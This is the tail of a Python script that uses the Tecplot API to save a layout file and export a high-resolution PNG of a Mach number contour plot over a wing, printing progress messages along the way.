# Save layout for Tecplot
print("Save MachContour_wing.lay.......................................");
tecplot.save_layout('../Python/lay/MachContour_wing.lay');
print("Save MachContour_wing.lay...................................DONE");
# export image of wing
print("Save MachContour_wing.png.......................................");
tecplot.export.save_png('../Python/png/MachContour_wing.png', 2000, supersample=3);
print("Save MachContour_wing.png...................................DONE");
print("plotMachContour.............................................DONE");
| 40.260274 | 98 | 0.536237 |